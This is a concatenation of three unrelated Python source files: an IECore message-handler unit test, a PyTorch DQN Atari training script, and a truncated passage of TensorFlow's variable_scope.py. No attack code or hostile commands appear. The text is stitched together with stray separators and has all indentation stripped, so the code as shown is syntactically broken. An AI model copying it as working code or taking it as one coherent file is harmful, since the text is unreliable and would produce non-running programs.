# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import unittest
import threading
import time
import weakref
import IECore
class TestMessageHandler( unittest.TestCase ) :
def testAbbreviation( self ) :
self.assertEqual( IECore.Msg, IECore.MessageHandler )
self.assert_( IECore.Msg is IECore.MessageHandler )
def testStack( self ) :
for i in range( 1, 10 ) :
m = IECore.NullMessageHandler()
with m :
self.assertTrue( m.isSame( IECore.MessageHandler.currentHandler() ) )
m1 = IECore.NullMessageHandler()
m2 = IECore.NullMessageHandler()
self.assertTrue( IECore.MessageHandler.currentHandler().isSame( IECore.MessageHandler.getDefaultHandler() ) )
with m1 :
self.assertTrue( IECore.MessageHandler.currentHandler().isSame( m1 ) )
with m2 :
self.assertTrue( IECore.MessageHandler.currentHandler().isSame( m2 ) )
self.assertTrue( IECore.MessageHandler.currentHandler().isSame( m1 ) )
self.assertTrue( IECore.MessageHandler.currentHandler().isSame( IECore.MessageHandler.getDefaultHandler() ) )
def testLevelStringConversion( self ) :
ll = [
(IECore.MessageHandler.Level.Error, "ERROR"),
(IECore.MessageHandler.Level.Warning, "WARNING"),
(IECore.MessageHandler.Level.Info, "INFO"),
(IECore.MessageHandler.Level.Debug, "DEBUG"),
(IECore.MessageHandler.Level.Invalid, "INVALID"),
]
for l, s in ll :
self.assertEqual( IECore.MessageHandler.levelAsString( l ), s )
self.assertEqual( IECore.MessageHandler.stringAsLevel( s ), l )
self.assertEqual( IECore.MessageHandler.stringAsLevel( s.lower() ), l )
def testOutput( self ) :
with IECore.NullMessageHandler() :
IECore.MessageHandler.output( IECore.Msg.Level.Debug, "message handler test", "ignore me" )
IECore.MessageHandler.output( IECore.Msg.Level.Info, "message handler test", "and me" )
IECore.MessageHandler.output( IECore.Msg.Level.Warning, "message handler test", "and me" )
IECore.MessageHandler.output( IECore.Msg.Level.Error, "message handler test", "and me" )
IECore.msg( IECore.Msg.Level.Error, "message handler test", "and me" )
def testOStreamHandler( self ) :
IECore.OStreamMessageHandler.cErrHandler()
IECore.OStreamMessageHandler.cOutHandler()
def testCompoundHandler( self ) :
h = IECore.CompoundMessageHandler()
h.addHandler( IECore.OStreamMessageHandler.cErrHandler() )
h.addHandler( IECore.OStreamMessageHandler.cOutHandler() )
h.removeHandler( IECore.OStreamMessageHandler.cErrHandler() )
h.removeHandler( IECore.OStreamMessageHandler.cOutHandler() )
def testLevelFilteredMessageHandler( self ):
with IECore.LevelFilteredMessageHandler( IECore.NullMessageHandler(), IECore.Msg.Level.Info ) :
IECore.MessageHandler.output( IECore.Msg.Level.Debug, "message handler test", "ignore me" )
IECore.MessageHandler.output( IECore.Msg.Level.Info, "message handler test", "and me" )
IECore.MessageHandler.output( IECore.Msg.Level.Warning, "message handler test", "and me" )
IECore.MessageHandler.output( IECore.Msg.Level.Error, "message handler test", "and me" )
class Derived( IECore.MessageHandler ):
def __init__( self ):
IECore.MessageHandler.__init__( self )
self.lastMessage = IECore.StringData("")
self.lastContext = IECore.StringData("")
self.lastLevel = IECore.IntData(0)
def handle( self, level, context, msg ):
self.lastLevel.value = level
self.lastContext.value = context
self.lastMessage.value = msg
def testSubclassing( self ):
myHandler = self.Derived()
with myHandler :
IECore.MessageHandler.output( IECore.Msg.Level.Info, "context", "message" )
self.assertEqual( myHandler.lastLevel.value, IECore.Msg.Level.Info )
self.assertEqual( myHandler.lastContext.value, "context" )
self.assertEqual( myHandler.lastMessage.value, "message" )
def testContextManager( self ) :
currentHandler = IECore.MessageHandler.currentHandler()
myHandler = self.Derived()
with myHandler :
IECore.MessageHandler.output( IECore.Msg.Level.Info, "context", "message" )
self.failUnless( currentHandler.isSame( IECore.MessageHandler.currentHandler() ) )
self.assertEqual( myHandler.lastLevel.value, IECore.Msg.Level.Info )
self.assertEqual( myHandler.lastContext.value, "context" )
self.assertEqual( myHandler.lastMessage.value, "message" )
def testIsRefCounted( self ) :
self.assert_( issubclass( IECore.MessageHandler, IECore.RefCounted ) )
def testDefaultHandler( self ) :
self.failUnless( isinstance( IECore.MessageHandler.currentHandler(), IECore.LevelFilteredMessageHandler ) )
def testSetLogLevel( self ) :
oldLevel = IECore.MessageHandler.currentHandler().getLevel()
if oldLevel==IECore.MessageHandler.Level.Info :
newLevel = IECore.MessageHandler.Level.Warning
else :
newLevel = IECore.MessageHandler.Level.Info
IECore.setLogLevel( newLevel )
self.assertEqual( IECore.MessageHandler.currentHandler().getLevel(), newLevel )
IECore.setLogLevel( oldLevel )
self.assertEqual( IECore.MessageHandler.currentHandler().getLevel(), oldLevel )
def testContextManagerReturnValue( self ) :
mh = self.Derived()
with mh as mh2 :
pass
self.failUnless( mh is mh2 )
def testThreading( self ) :
def f( handler ) :
with handler :
for i in range( 0, 100 ) :
IECore.msg( IECore.Msg.Level.Info, "test", str( i ) )
time.sleep( 0.0001 ) # encourage python to switch threads
handlers = []
threads = []
for i in range( 0, 100 ) :
handler = IECore.CapturingMessageHandler()
thread = threading.Thread( target = f, args = [ handler ] )
threads.append( thread )
handlers.append( handler )
thread.start()
for thread in threads :
thread.join()
for handler in handlers :
self.assertEqual( len( handler.messages ), 100 )
for i, m in enumerate( handler.messages ) :
self.assertEqual( str( i ), m.message )
def testLifetime( self ) :
m = IECore.NullMessageHandler()
w = weakref.ref( m )
with m :
pass
del m
self.assertEqual( w(), None )
if __name__ == "__main__":
unittest.main()
|
dqn_atari.py
|
#!/usr/bin/env python3
import ptan
import argparse
import torch.optim as optim
import torch.multiprocessing as mp
from tensorboardX import SummaryWriter
from lib import dqn_model, common, atari_wrappers
PLAY_STEPS = 4
def make_env(params):
env = atari_wrappers.make_atari(params['env_name'])
env = atari_wrappers.wrap_deepmind(env, frame_stack=True, pytorch_img=True)
return env
def play_func(params, net, cuda, exp_queue):
env = make_env(params)
writer = SummaryWriter(comment="-" + params['run_name'] + "-dqn")
selector = ptan.actions.EpsilonGreedyActionSelector(epsilon=params['epsilon_start'])
epsilon_tracker = common.EpsilonTracker(selector, params)
agent = ptan.agent.DQNAgent(net, selector, cuda=cuda)
exp_source = ptan.experience.ExperienceSourceFirstLast(env, agent, gamma=params['gamma'], steps_count=1)
exp_source_iter = iter(exp_source)
frame_idx = 0
with common.RewardTracker(writer, params['stop_reward']) as reward_tracker:
while True:
frame_idx += 1
exp = next(exp_source_iter)
exp_queue.put(exp)
epsilon_tracker.frame(frame_idx)
new_rewards = exp_source.pop_total_rewards()
if new_rewards:
if reward_tracker.reward(new_rewards[0], frame_idx, selector.epsilon):
break
exp_queue.put(None)
if __name__ == "__main__":
mp.set_start_method('spawn')
params = common.HYPERPARAMS['pong']
params['batch_size'] *= PLAY_STEPS
parser = argparse.ArgumentParser()
parser.add_argument("--cuda", default=False, action="store_true", help="Enable cuda")
args = parser.parse_args()
env = make_env(params)
net = dqn_model.DQN(env.observation_space.shape, env.action_space.n)
if args.cuda:
net.cuda()
tgt_net = ptan.agent.TargetNet(net)
buffer = ptan.experience.ExperienceReplayBuffer(experience_source=None, buffer_size=params['replay_size'])
optimizer = optim.Adam(net.parameters(), lr=params['learning_rate'])
exp_queue = mp.Queue(maxsize=PLAY_STEPS * 2)
play_proc = mp.Process(target=play_func, args=(params, net, args.cuda, exp_queue))
play_proc.start()
frame_idx = 0
while play_proc.is_alive():
frame_idx += PLAY_STEPS
for _ in range(PLAY_STEPS):
exp = exp_queue.get()
if exp is None:
play_proc.join()
break
buffer._add(exp)
if len(buffer) < params['replay_initial']:
continue
optimizer.zero_grad()
batch = buffer.sample(params['batch_size'])
loss_v = common.calc_loss_dqn(batch, net, tgt_net.target_model, gamma=params['gamma'],
cuda=args.cuda, cuda_async=True)
loss_v.backward()
optimizer.step()
if frame_idx % params['target_net_sync'] < PLAY_STEPS:
tgt_net.sync()
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util.tf_export import tf_export
__all__ = ["AUTO_REUSE", "VariableScope", "get_variable_scope",
"get_variable", "get_local_variable", "variable_scope",
"variable_op_scope", "no_regularizer"]
from tensorflow.python.ops import math_ops
class BF16Zeros(init_ops.Initializer):
"""Initializer that generates tensors initialized to 0."""
def __init__(self, dtype=dtypes.float32):
self.dtype = dtypes.as_dtype(dtype)
def __call__(self, shape, dtype=None, partition_info=None):
return math_ops.to_bfloat16(array_ops.zeros(shape, dtypes.float32))
def get_config(self):
return {"dtype": self.dtype.name}
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export("AUTO_REUSE").export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self, name, shape=None, dtype=dtypes.float32,
initializer=None, regularizer=None, reuse=None,
trainable=True, collections=None, caching_device=None,
partitioner=None, validate_shape=True, use_resource=None,
custom_getter=None, constraint=None):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter(name, shape=None, dtype=dtypes.float32, # pylint: disable=missing-docstring
initializer=None, regularizer=None, reuse=None,
trainable=True, collections=None, caching_device=None,
partitioner=None, validate_shape=True, use_resource=None,
constraint=None):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, reuse=reuse,
trainable=trainable, collections=collections,
caching_device=caching_device, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
}
# `fn_args` can handle functions, `functools.partial`, `lambda`.
if "constraint" in function_utils.fn_args(custom_getter):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer,
reuse=reuse, trainable=trainable, collections=collections,
caching_device=caching_device, partitioner=partitioner,
validate_shape=validate_shape, use_resource=use_resource,
constraint=constraint)
def _get_partitioned_variable(
self, name, partitioner, shape=None, dtype=dtypes.float32,
initializer=None, regularizer=None, reuse=None,
trainable=True, collections=None, caching_device=None,
validate_shape=True, use_resource=None, constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
reuse_without_partition = reuse and not partitioner
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
if not reuse_without_partition:
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable (%s) must be "
"fully defined, but instead was %s." % (name, shape))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
partitions = partitioner(shape=shape, dtype=dtype)
if not isinstance(partitions, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% partitions)
if len(partitions) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (partitions, shape))
if any([p < 1 for p in partitions]):
raise ValueError(
"Partitioner returned zero partitions for some axes: %s" %
partitions)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (not reuse_without_partition and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, slice_shape = _compute_slice_dim_and_shape(
shape.as_list(), partitions)
vs = []
num_slices = partitions[slice_dim]
num_slices_with_excess = shape[slice_dim].value % num_slices
slice_offset = [0] * shape.ndims
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
for i in xrange(num_slices):
var_shape = slice_shape[:]
var_offset = slice_offset[:]
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
if i < num_slices_with_excess:
var_shape[slice_dim] += 1
slice_offset[slice_dim] += var_shape[slice_dim]
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
# pylint: disable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
# pylint: enable=protected-access
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=True,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
